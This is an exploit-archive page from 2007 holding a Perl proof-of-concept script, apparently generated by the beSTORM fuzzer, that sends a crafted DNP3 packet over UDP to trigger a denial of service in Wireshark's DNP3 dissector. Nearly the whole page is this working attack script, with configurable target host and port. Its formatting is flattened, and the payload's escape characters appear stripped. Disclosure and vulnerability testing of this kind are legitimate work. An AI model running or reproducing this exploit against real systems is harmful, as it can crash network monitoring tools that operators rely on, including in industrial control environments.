Home / exploits wiresharkdnp3-dos.txt
Posted on 31 August 2007
#!/usr/bin/perl # Automatically generated by beSTORM(tm) # Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $) # Attack vector: # M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 # Module: # DNP3 use strict; use warnings; use Getopt::Std; use IO::Socket::INET; $SIG{INT} = &abort; my $host = '192.168.4.52'; my $port = 20000; my $proto = 'udp'; my $sockType = SOCK_DGRAM; my $timeout = 1; #Read command line arguments my %opt; my $opt_string = 'hH:P:t:'; getopts( "$opt_string", \%opt ); if (defined $opt{h}) { usage() } $host = $opt{H} ? $opt{H} : $host; $port = $opt{P} ? $opt{P} : $port; $timeout = $opt{t} ? $opt{t} : $timeout; my @commands = ( {Command => 'Send', Data => "xC3xC0x01x01x00x01x07x08x01x02x03x04x05x06x07x08}, {Command => 'Receive'}, ); ### # End user configurable part ### #1. Create a new connection my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => $port, Proto => $proto, Type => $sockType, Timeout => $timeout, ) or die "socket error: $! "; print "connected to: $host:$port "; $sock->autoflush(1); binmode $sock; #2. communication part foreach my $command (@commands) { if ($command->{'Command'} eq 'Receive') { my $buf = receive($sock, $timeout); if (length $buf) { print "received: [$buf] "; } } elsif ($command->{'Command'} eq 'Send') { print "sending: [".$command->{'Data'}."] "; send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $! "; } } #3. Close connection close ($sock); #The end sub receive { my $sock = shift; my $timeout = shift; my $tmpbuf; my $buf = ""; while(1) { # Example from perldoc -f alarm eval { local $SIG{ALRM} = sub { die "timeout " }; alarm $timeout; my $ret = read $sock, $tmpbuf, 1; #We read data one byte at a time. if ( !defined $ret or $ret == 0 ) { #EOF die "timeout "; } alarm 0; $buf .= $tmpbuf; }; if ($@) { #time out if($@ eq "timeout ") { last; } else { die "receive aborted "; } } } #while return $buf; } sub abort { print "aborting... "; if ($sock) { close $sock; } die "User aborted operation "; } sub usage { print "usage: $0 [-hHPt] "; print "-h : this help message "; print "-H : override default host - $host "; print "-P : override default port - $port "; print "-t : set socket timeout in seconds "; exit 0; }